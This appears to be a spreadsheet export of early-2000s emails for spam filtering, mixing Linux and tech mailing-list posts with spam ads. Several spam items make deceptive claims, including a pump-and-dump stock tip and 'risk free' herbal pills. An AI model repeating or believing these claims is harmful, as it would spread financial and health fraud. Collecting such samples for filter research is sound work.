 &gt; &gt; &gt; smarter about handling that file, but first I have a few other fish to fry in 
 &gt; &gt; &gt; my rather large patch that's on it's way.
 &gt; &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; No panic,
 &gt; &gt; 
 &gt; &gt; I'm all for cleaning things up before getting it optimized.
 &gt; 
 &gt; Okay, this fix is now checked in.
 &gt; 
 I'm afraid it didn't help. It still seems to be slower than ~1 month 
 ago. Maybe slightly faster than yeasterday. I'm (still) seeing an 
 "unseen countdown" in the log.
 18:51:25 Writing /home/ander/Mail/lists/l-k/.mh_sequences
 18:51:25 lists/l-k has 57 msgs in unseen
 18:51:25 lists/l-k has 56 msgs in unseen
 18:51:25 lists/l-k has 55 msgs in unseen
 18:51:26 lists/l-k has 54 msgs in unseen
 18:51:26 lists/l-k has 53 msgs in unseen
 18:51:26 lists/l-k has 52 msgs in unseen
 18:51:26 lists/l-k has 51 msgs in unseen
 18:51:26 lists/l-k has 50 msgs in unseen
 18:51:26 lists/l-k has 49 msgs in unseen
 18:51:26 lists/l-k has 48 msgs in unseen
 18:51:26 lists/l-k has 47 msgs in unseen
 18:51:26 lists/l-k has 46 msgs in unseen
 18:51:26 lists/l-k has 45 msgs in unseen
 18:51:27 lists/l-k has 44 msgs in unseen
 18:51:27 lists/l-k has 43 msgs in unseen
 18:51:27 lists/l-k has 42 msgs in unseen
 18:51:27 lists/l-k has 41 msgs in unseen
 18:51:27 lists/l-k has 40 msgs in unseen
 18:51:27 lists/l-k has 39 msgs in unseen
 18:51:27 lists/l-k has 38 msgs in unseen
 18:51:27 lists/l-k has 37 msgs in unseen
 18:51:27 lists/l-k has 36 msgs in unseen
 18:51:28 lists/l-k has 35 msgs in unseen
 18:51:28 lists/l-k has 34 msgs in unseen
 18:51:28 lists/l-k has 33 msgs in unseen
 18:51:28 lists/l-k has 32 msgs in unseen
 18:51:28 lists/l-k has 31 msgs in unseen
 18:51:28 lists/l-k has 30 msgs in unseen
 18:51:28 lists/l-k has 29 msgs in unseen
 18:51:28 lists/l-k has 28 msgs in unseen
 18:51:28 lists/l-k has 27 msgs in unseen
 18:51:28 lists/l-k has 26 msgs in unseen
 18:51:29 lists/l-k has 25 msgs in unseen
 18:51:29 lists/l-k has 24 msgs in unseen
 18:51:29 lists/l-k has 23 msgs in unseen
 18:51:29 lists/l-k has 22 msgs in unseen
 18:51:29 lists/l-k has 21 msgs in unseen
 18:51:29 lists/l-k has 20 msgs in unseen
 18:51:29 lists/l-k has 19 msgs in unseen
 18:51:29 lists/l-k has 18 msgs in unseen
 18:51:29 lists/l-k has 17 msgs in unseen
 18:51:29 lists/l-k has 16 msgs in unseen
 18:51:30 lists/l-k has 15 msgs in unseen
 18:51:30 lists/l-k has 14 msgs in unseen
 18:51:30 lists/l-k has 13 msgs in unseen
 18:51:30 lists/l-k has 12 msgs in unseen
 18:51:30 lists/l-k has 11 msgs in unseen
 18:51:30 lists/l-k has 10 msgs in unseen
 18:51:30 lists/l-k has 9 msgs in unseen
 18:51:30 digits changed
 18:51:30 lists/l-k has 8 msgs in unseen
 18:51:30 lists/l-k has 7 msgs in unseen
 18:51:31 lists/l-k has 6 msgs in unseen
 18:51:31 lists/l-k has 5 msgs in unseen
 18:51:31 lists/l-k has 4 msgs in unseen
 18:51:31 lists/l-k has 3 msgs in unseen
 18:51:31 lists/l-k has 2 msgs in unseen
 18:51:31 lists/l-k has 1 msgs in unseen
 18:51:31 lists/l-k has 0 msgs in unseen
 18:51:31 FlistUnseenFolder lists/l-k
 18:51:31 ok
 18:51:47 Folder_Change lists/exmh {Msg_Show cur}
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] URGENT: Cant get a skrew out... PLEASE HELP!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 21 Aug 2002 12:42:17 BST, Kiall Mac Innes said:
 &gt;Hi i have a phillips head skrew thats holding a circut board together i need
 &gt;to take it out ASAP and nothing will work, the threads on the skrew are
 &gt;almost completly gone, its is a very small skrew that i have to use a
 &gt;percision skrewdriver set to remove the skrews any help would be
 &gt;appreaciated...
 Get a very, *very* small set of drill bits.  Start drilling right
 through the center of the head, at a slow speed so you don't pop
 off and through the board!  Once you have a bit of an indent in,
 increase the speed a little bit.
 If you've made a deepish indent, and the head doesn't pop off, use
 the next largest drill bit you have.  Repeat until happy.
 Eventually the head should just pop off, allowing you to lift the
 board off over the shaft of the screw... then ye can take out the
 rest fairly easily with a pliers or whatnot.
 -- 
 	Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I think that this and other articles confuse Socialism with 
 Bureaucracy.  Libertarianism as implemented in North America is not 
 exactly the shining pinnacle of economic efficiency.
 Just try starting a telephone company in the US or (even worse) 
 Canada.  It can take a year or more to get the blessing of our own 
 "Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more 
 socialist leaning Canada, Industry Canada and the CRTC).
 Yet, despite all of this intense regulation and paper pushing, as 
 well as regulatory scrutiny by the FTC, SEC, and IRS, the 
 executives of Telecom Companies have managed to bilk the investment 
 community for what looks to be tens of billions of dollars.  They 
 finished their routine with the a quadruple lutz -- laying off 
 hundreds of thousands of workers when it all came crashing down.
 So.. tell me again.. how are we better off?
 -Ian.
 On Tuesday, August 20, 2002, at 12:09 PM, John Hall wrote:
 &gt; The Mystery of Capital: Why Capitalism Triumphs in the West and Fails
 &gt; Everywhere Else -- by Hernando De Soto	
 &gt;
 &gt; Is something I'm reading now.
 &gt;
 &gt; My impression is that France is not anywhere near the "Permit Raj"
 &gt; nightmare that India is (and became).  Nor has its market been closed
 &gt; like India's has.
 &gt;
 &gt; But De Soto's work is perhaps just as important or more so.  He hasn't
 &gt; dealt specifically with India, but I recall examples from Peru,
 &gt; Philippines, and Egypt.  In Lima, his team took over a year (I think it
 &gt; was 2) working 8 hr days to legally register a 1 person company.  
 &gt; In the
 &gt; Philippines, getting legal title can take 20 years.  In Egypt, 
 &gt; about 80%
 &gt; of the population in Cairo lives in places where they are officially
 &gt; illegal.
 &gt;
 &gt; India hasn't been helped by its socialism.  Socialism has certainly
 &gt; helped strangle the country in permits.  But perhaps De Soto is right
 &gt; that the real crippling thing is keeping most of the people out of the
 &gt; legal, official property system.
 &gt;
 &gt; Putting most of the people in the property system was something 
 &gt; the west
 &gt; only finished about 100 years ago, or Japan did 50 years ago.  It 
 &gt; wasn't
 &gt; easy, but we live in a society that doesn't even remember we did it.
 &gt;
 &gt;
 &gt;&gt; -----Original Message-----
 &gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Robert
 &gt;&gt; Harley
 &gt;&gt; Sent: Tuesday, August 20, 2002 11:24 AM
 &gt;&gt; To: fork@spamassassin.taint.org
 &gt;&gt; Subject: Re: The Curse of India's Socialism
 &gt;&gt;
 &gt;&gt; RAH quoted:
 &gt;&gt;&gt; Indians are not poor because there are too many of them; they are
 &gt; poor
 &gt;&gt;&gt; because there are too many regulations and too much government
 &gt;&gt; intervention
 &gt;&gt;&gt; -- even today, a decade after reforms were begun. India's greatest
 &gt;&gt; problems
 &gt;&gt;&gt; arise from a political culture guided by socialist instincts on the
 &gt; one
 &gt;&gt;&gt; hand and an imbedded legal obligation on the other hand.
 &gt;&gt;
 &gt;&gt; Nice theory and all, but s/India/France/g and the statements hold just
 &gt;&gt; as true, yet France is #12 in the UN's HDI ranking, not #124.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;&gt; Since all parties must stand for socialism, no party espouses
 &gt;&gt;&gt; classical liberalism
 &gt;&gt;
 &gt;&gt; I'm not convinced that that classical liberalism is a good solution
 &gt;&gt; for countries in real difficulty.  See Joseph Stiglitz (Nobel for
 &gt;&gt; Economics) on the FMI's failed remedies.  Of course googling on
 &gt;&gt; "Stiglitz FMI" only brings up links in Spanish and French.  I guess
 &gt;&gt; that variety of spin is non grata in many anglo circles.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; R
 &gt;&gt; http://xent.com/mailman/listinfo/fork
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Chuck Murcko wrote:
 &gt;[...stuff...]
 Yawn.
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] BIG CHANGE coming up in cvs
</t>
  </si>
  <si>
    <t xml:space="preserve">CVS users: heads up! I think we've been talking about it long enough, so
 we might as well check it in now.  It's about time to check in
 http://bugzilla.spamassassin.org/show_bug.cgi?id=546
 This change will *remove* support for delivery to a local mailbox (ie the
 default mode of operation when "spamassassin" is run).
 In addition, the "From " line will no longer be added to mails as a
 result.
 --j.
 -- 
 'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }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</si>
  <si>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Interested in Renting or Selling your
 Timeshare or Vacation Membership?
 We can help!
 For a FREE consultation, simply reply
 with your name and telephone number.
 Also include the name of your resort.
 We will be in touch with you shortly!
 	     Have a great day!  
 Removal instructions:
 *************************
 To be removed from this list please reply with "remove" in the subject.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Herbal Viagra 30 day trial....                  XMXP
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;
 &lt;td&gt;&lt;font  face=3D"bankgothic, western" color=3D"#6600FF"  size=3D5&gt;&lt;p&gt;&lt;b&gt;
 &lt;a href=3D"http://211.141.69.11:5611/ang/index.asp?id=3D609"&gt;
 Mother Natures all Natural Marital Aid&lt;br&gt; for Men and Women - Your's Risk=
  Free!&lt;/b&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;font face=3D"arial black" color=3D"#000000" size=3D3&gt;&lt;p&gt;The all natural s=
 afe formula for men and women your's risk free for 30 days. Mother Nature'=
 s wonder pill of the 21st century.&lt;p&gt;
 &lt;li&gt;Increased Sensation&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Frequency&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Pleasure&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Desire&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Stamina&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Libido&lt;/li&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 Both male and female formulas!&lt;br&gt;&lt;p&gt;&lt;body bgcolor=3D"#FFFFFF"&gt;
 Order Your  Trial Today !&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face=3Darial size=3D1.5&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;p&gt;to depart from further contac=
 ts
 &lt;a href=3D"http://211.141.69.11:5611/ang/service.html"&gt;visit here&lt;/a&gt;&lt;/p&gt;&lt;=
 /font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 vidal
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Matthias wrote :
 &gt; Hi, Matthias..
 &gt; 
 &gt; &gt; ..it's a major release and supports now SGI's FAM technology
 &gt; 
 &gt; ..requires currently some changes for the spec because the dep to fam
 &gt; 2.6.7-6.
 &gt; For compiling fam.h (fam-evel) is required too.
 Indeed, I had repackaged a first version, but without fam support (not
 released). I'll release the package with fam support right now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</si>
  <si>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Photoshop Sean Connery giving us some good advice
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8424916,1717/
 Date: 2002-10-01T09:35:15+01:00
 (Local Library)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Yannick Gingras wrote:
 &gt;    I am wondering if there are any techniques to make a CD-Key of the like 
 &gt; unbreakable.  Either by giving it a cancelation date and a periodic renewal 
 &gt; from a server or just by using self md5 signature on the resulting 
 &gt; executable.  I know it must not be easy because the whole software piracy 
 &gt; problem would be resolved but there must be some way to make it really hard 
 &gt; to break it.  Anyone have hints on this issue ?
 What do you mean by "CD-Key or the like" (I presume that "of" was a
 typo)? And what do you mean by "unbreakable"?
 You need to be far more explicit about the problem which you wish to
 solve, and about the constraints involved.
 Some general points:
 1. For a conventional "CD key" system, where the actual CDs are
 mass-produced (where you have many identical CDs), and the entire
 system has to work offline, you cannot solve the problem of valid keys
 being "traded" (e.g. included along with bootleg copies of the
 product).
 If there's an online element involved, you can "tie" keys to a
 specific hardware configuration, as is done (AFAIK) for Windows XP's
 "product activation".
 2. Anything which uses a symmetric cipher (or hash) is bound to be
 vulnerable to reverse engineering of the validation routines within
 the executable.
 3. Ultimately, any software mechanism will be vulnerable to
 "cracking", i.e. modifying the software to disable or circumvent the
 validation checks.
 This can only be prevented by the use of trusted hardware (e.g. a
 Palladium-style system).
 Most significantly, the data must be supplied in a form which is only
 accessible by that hardware. If anyone can get at the data in a
 meaningful (i.e. unencrypted) form, they can extract the useful parts
 and discard the rest (i.e. any associated protection mechanisms).
 IOW, you have to "keep the genie in the bottle" at all times. If the
 data can be got at just once (even if it requires the use of dedicated
 hardware such as a bus analyser), it can then be duplicated and
 distributed without limit.
 -- 
 Glynn Clements &lt;glynn.clements@virgin.net&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: in under 1 minute - we can beat your current rate 38191297
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;table width="715"&gt;
   &lt;tr&gt;
     &lt;td vAlign="top" align="left" width="511"&gt;
       &lt;blockquote&gt;
         &lt;font color="navy" size="4"&gt;&lt;font face="arial" color="red" size="3"&gt;&lt;b&gt;&lt;i&gt;&amp;quot;Now
         is the time to take advantage of falling interest rates! There is no
         advantage in waiting any longer.&amp;quot;&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;/font&gt;&lt;font size="3"&gt;Refinance or consolidate high interest credit card
         debt into a low interest mortgage. Mortgage interest is tax deductible,
         whereas credit card interest is not.&lt;br&gt;
         &lt;br&gt;
         You can save thousands of dollars over the course of your loan with just
         a 0.25% drop in your rate!&lt;br&gt;
         &lt;br&gt;
         Our nationwide network of lenders have hundreds of different loan
         programs to fit your current situation:
         &lt;blockquote&gt;
           &lt;font color="red"&gt;&lt;b&gt;
           &lt;ul&gt;
             &lt;li&gt;Refinance
             &lt;li&gt;Second Mortgage
             &lt;li&gt;Debt Consolidation
             &lt;li&gt;Home Improvement
             &lt;li&gt;Purchase&lt;/li&gt;
           &lt;/ul&gt;
           &lt;/b&gt;
           &lt;/blockquote&gt;
         &lt;/font&gt;
         &lt;p align="center"&gt;&lt;font size="4"&gt;Let
         us do the shopping for you...&lt;a href=" http://www.lowest-rate.net/cgi-bin/best_rate_virtual.cgi?affiliate=510511"&gt;IT IS FREE!&lt;br&gt;
         CLICK HERE&amp;quot;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;br&gt;
         &lt;b&gt;Please&lt;a href=" http://www.lowest-rate.net/cgi-bin/best_rate_virtual.cgi?affiliate=510511"&gt;
         CLICK HERE &lt;/a&gt; to fill out a quick form. Your request will be
         transmitted to our network of mortgage specialists who will respond with
         up to three independent offers.&lt;/b&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;b&gt;This service is 100% free to home owners and new home buyers without
         any obligation.&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;
         &lt;p&gt;&lt;font size="3" color="navy"&gt;&lt;b&gt;Visit the website to be taken out of this database.&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/blockquote&gt;
     &lt;/td&gt;
     &lt;td vAlign="top" align="right" width="190"&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;basefont size="2"&gt;
       &lt;table width="175" bgColor="#eeeeee"&gt;
         &lt;tbody&gt;
           &lt;tr&gt;
             &lt;td align="middle" colSpan="2"&gt;National Averages&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;&lt;u&gt;Program&lt;/u&gt;&lt;/td&gt;
             &lt;td&gt;&lt;u&gt;Rate&lt;/u&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;30Year Fixed&lt;/td&gt;
             &lt;td width="42"&gt;6.375%&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;15Year Fixed&lt;/td&gt;
             &lt;td width="42"&gt;5.750%&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;5Year Balloon&lt;/td&gt;
             &lt;td width="42"&gt;5.250%&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;1/1Arm&lt;/td&gt;
             &lt;td width="42"&gt;4.250%&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;5/1Arm&lt;/td&gt;
             &lt;td width="42"&gt;5.625%&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;&lt;font size="-2"&gt;FHA30 Year Fixed&lt;/font&gt;&lt;/td&gt;
             &lt;td width="42"&gt;6.500%&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="91"&gt;VA 30 Year Fixed&lt;/td&gt;
             &lt;td width="42"&gt;6.500%&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/tbody&gt;
       &lt;/table&gt;
       &lt;br&gt;
       &lt;font size="2"&gt;
       &lt;p align="right"&gt;&amp;quot;&lt;i&gt;You did all the shopping for me. Thank you!&lt;/i&gt;&lt;br&gt;
       &lt;b&gt;-&lt;font size="1"&gt;T&lt;/font&gt;&lt;/font&gt;&lt;font size="1"&gt;.&lt;font size="2"&gt; N. Cap.&lt;/font&gt;&lt;/font&gt;&lt;font size="2"&gt;
       &lt;font size="1"&gt;CA&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
       &lt;p align="right"&gt;&amp;quot;&lt;i&gt;..You helped me finance a new home and I got a
       very good deal.&lt;/i&gt;&lt;br&gt;
       &lt;b&gt;-&lt;font size="1"&gt; R. H. H. CA&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       &lt;p align="right"&gt;&amp;quot;&lt;i&gt;..it was easy, and quick...!&lt;/i&gt;&lt;br&gt;
       &lt;b&gt;-&lt;font size="1"&gt;V. S. N. P. WA&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       &lt;br&gt;
       &lt;/p&gt;
       &lt;/td&gt;
     &lt;/table&gt;
   &lt;/body&gt;
 &lt;/html&gt;
 38191297
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Never mind, there was some cron thing doing rpm -qf ???  seems fine now.
 --On Wednesday, February 06, 2002 07:37:44 +1300 Mark Derricutt 
 &lt;mark@talios.com&gt; wrote:
 &gt; Fetched 88.1kB in 2m31s (581B/s)
 &gt; error: cannot get exclusive lock on /var/lib/rpm/Packages
 &gt; error: cannot open Packages index using db3 - Operation not permitted (1)
 &gt; E: could not open RPM database:cannot open Packages index using db3 -
 &gt; Operation not permitted (1)
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] hwclock
</t>
  </si>
  <si>
    <t xml:space="preserve">On 0020 +0100 %{!Mon, Aug 19, 2002 at 11:30:12PM +0100}, Anthony wrote:
 &gt; to the net. However, I didn't realise that Windows altered the hw clock
 &gt; as there was no mention of it in any of the docs I read. 
 &gt; I still dual-boot on a regular basis and if Windows is sneakily messing
 &gt; with the clock, I'd be interested to know in what way it is and how it
 &gt; couild be stopped from doing so.
 In my experience Windows will change the hardware clock the first time
 you boot into it after the clocks have gone forward/back an hour.  This
 will only happen twice a year. How to stop it, I have not checked (I
 just switch the clock back an hour from within windows after such a
 reboot).  Is there a GMT windows timezone?
 With ntp, it is a big no-no (afaik) to have other programs messing with
 the clock as it will put ntp's calculations of drift etc., out. (maybe
 this only applies to chrony, which is what I use).  If the windows
 change only moves forward an hour, and you shift back an hour, maybe ntp
 will be (relatively) ok (depends if all the remaining digits of time
 precision are left unchanged, probably they aren't exactly).
 m
 -- 
 Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
 Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: Sun Solaris
</t>
  </si>
  <si>
    <t xml:space="preserve">Al white wrote:
  &gt;erm... it runs Solaris x86 as standard...
 It runs Solaris 8 x86 as standard.
 (I was joking Al)
 M.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Of Muslims and Morris men
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357893,215/
 Date: 2002-09-29T00:40:02+01:00
 It wasn't just the lack of wellies that made this protest different - it was 
 the mix of the marchers, writes *Euan Ferguson*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, as many have said, it's non-trivial and not smart enough.
 I did try just cvs'ing over the existing sources, but cvs complained that my 
 files were in the way.
 Then I thought that I'd only need the DRI stuff, that took about 1.5 hours to 
 fetch 116M. Unfortunately I still need the XFree86 cvs stuff as well :-( At 
 339M that took almost 3 hours.
 Now I can start building the XFree86 cvs and DRI cvs stuff for testing the 3D 
 patches for my GVX1 card. I just hope I don't completely trash my system in 
 the process. 
 Think I'll wait until morning to start building, though. I've been building a 
 new box from source this week. A 200Mhz PentiumMMX with 96M. It took a full 
 day to build XFree86 4.2.0 and 2.5 days each to build qtlibs and kdelibs. 
 kdebase took just under 46 hours. I've got lots of grief from the wife for 
 the computer running 'round the clock this week. The rest of KDE should build 
 in under 20 hour increments.
 Cheers,
 	John Gay
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
 wintermute &lt;cout@eircom.net&gt; a crit:
 &gt; &gt; I'm confused. I thought it was GPL'ed and
 &gt; &gt; that the money you paid SuSE was for your
 &gt; &gt; 60 day support or whatever? 
 &gt; No, as of oh, about a year to a year and a half ago
 &gt; SuSE revoked it's free offering of it's retail
 &gt; distro.
 &gt; Sometime about the start of the great slump, SuSE
 &gt; pulled free release of it's main x86 product.
 Fine - nobody can oblige SuSE to do anything other
 than put up the ftp version, but surely they
 can't prevent a CD owner from burning a copy and
 giving it to me?
 What is the GPL all about then?
 &gt; I'm not sure on the details of it, but I think SuSE
 &gt; have probably done an OpenBSD of the cd they sell?
 But *_surely_* they cannot BSD Linux? It's not
 theirs to BSD!
 &gt; I could be wrong, I don't use SuSE so haven't
 &gt; investigated, but essentially the only 'free'
 &gt; version of SuSE will be it's tp offering.
 Nobody can oblige them to give away anything
 other than ftp - I'm not asking for that. I'm
 asking for somebody who has Linux (GPL'ed) to
 burn a copy for me and give it to me in exchange
 for a reasonable consideration (say, the price of
 the CDs and a bottle of Frascati or a couple of
 pints?).
 What does the GPL mean now?
 I don't want their 60 days of free email support
 or anything similar (if I did, I would pay for
 it).
 Paul...
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TRADING INFORMATION
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;HEAD&gt;
     &lt;TITLE&gt;
     &lt;/TITLE&gt;
 &lt;META http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Dwindo=
 ws-1252=22&gt;
     &lt;STYLE&gt;
 A:link =7B
     TEXT-DECORATION: none
 =7D
 A:active =7B
     TEXT-DECORATION: none
 =7D
 A:visited =7B
     TEXT-DECORATION: none
 =7D
 A:hover =7B
     COLOR: =230033ff; TEXT-DECORATION: underline
 =7D&lt;/STYLE&gt;
 &lt;META content=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;
 &lt;/HEAD&gt;
    &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgCo=
 lor=3D=22=23ffffff=22&gt;
        &lt;TABLE borderColor=3D=22=233366cc=22 cellSpacing=3D=224=22 cellPadding=3D=
 =2215=22 border=3D=224=22&gt;
            &lt;TR&gt;
                &lt;TD bgColor=3D=22=233366cc=22&gt;
                    &lt;DIV align=3D=22center=22&gt;                      
                       &lt;FONT face=3D=22arial, helvetica=22 color=3D=23ffffff&gt;=
                       &lt;FONT size=3D6&gt;                                 Fo=
 r 
                                        Immediate Release&lt;BR&gt;
                    &lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;
                &lt;/TD&gt;
            &lt;/TR&gt;
            &lt;TR&gt;
                &lt;TD&gt;
 &lt;P&gt;                  
                   &lt;FONT face=3D=22arial, helvetica=22 color=3D=23000000 size=
 =3D3&gt;                  
                   &lt;FONT 
       size=3D2&gt;&lt;STRONG&gt;Cal-Bay (Stock Symbol:&amp;nbsp;CBYI) 
       &lt;/STRONG&gt;Watch for analyst =22Strong Buy Recommendations=22 and sev=
 eral advisory newsletters 
       picking CBYI.&amp;nbsp;&amp;nbsp; CBYI has filed to be traded on the&amp;nbsp=
 ;OTCBB, 
       share prices historically INCREASE when companies get listed 
       on this larger trading&amp;nbsp;exhange. CBYI is trading around 25 ce=
 nts 
       and should skyrocket to =242.66 - =243.25 a share in the near futur=
 e. &amp;nbsp; 
       &lt;STRONG&gt;Put CBYI on your watch list, acquire a postion&lt;/STRONG&gt;&lt;/=
 FONT&gt;                  
                   &lt;FONT size=3D2&gt;&lt;STRONG&gt;TODAY.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/=
 P&gt;                  
                   &lt;FONT 
       face=3D=22arial, helvetica=22 color=3D=23000000 size=3D3&gt;              =
                   &lt;FONT size=3D2&gt;
 &lt;P&gt;                             REASONS TO INVEST IN CBYI
                                  &lt;LI&gt;   A profitable company and is on =
 track to beat ALL 
       earnings estimates                                
                                 &lt;FONT size=3D2&gt;    =21&lt;/FONT&gt;
                                  &lt;LI&gt;One of the FASTEST growing distrib=
 utors in environmental &amp;amp; safety 
       equipment instruments.
                                  &lt;LI&gt;&lt;/FONT&gt;                           =
                                 &lt;FONT size=3D2&gt;Excellent management team=
 , several EXCLUSIVE 
       contracts.&amp;nbsp; IMPRESSIVE client list including the&amp;nbsp;U.S. A=
 ir Force, 
       Anheuser-Busch, Chevron Refining and Mitsubishi Heavy Industries,=
       GE-Energy &amp;amp; Environmental Research.&lt;/FONT&gt;&lt;/FONT&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;RAPID=
 LY GROWING INDUSTRY&lt;/STRONG&gt;&amp;nbsp;&lt;BR&gt;Industry revenues exceed =24900 mil=
 lion, estimates indicate that there 
       could be as much as =2425 billion from =22smell technology=22 by the=
  end of 
       2003.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;=21=21=21=
 =21=21 CONGRATULATIONS 
       =21=21=21=21=21&lt;BR&gt;&lt;/STRONG&gt;Our last recommendation to buy&amp;nbsp;ORBT a=
 t 
       =241.29&amp;nbsp;rallied&amp;nbsp;and is holding steady at&amp;nbsp;=244.51=21&amp;n=
 bsp; 
       Congratulations to all our subscribers that took advantage of thi=
 s 
       recommendation.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;                                
                                 &lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;     =
                                 &lt;FONT 
       color=3D=230000ff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;
 &lt;P align=3D=22center=22&gt;&lt;STRONG&gt;                                
                                 &lt;FONT color=3D=23ff0000&gt;ALL removes HONER=
 ED. Please allow 7 
       days to be removed and send ALL address to:&lt;A href=3D=22mailto:NoMo=
 re=40btamail.net.cn=22&gt;
 NoMore=40btamail.net.cn
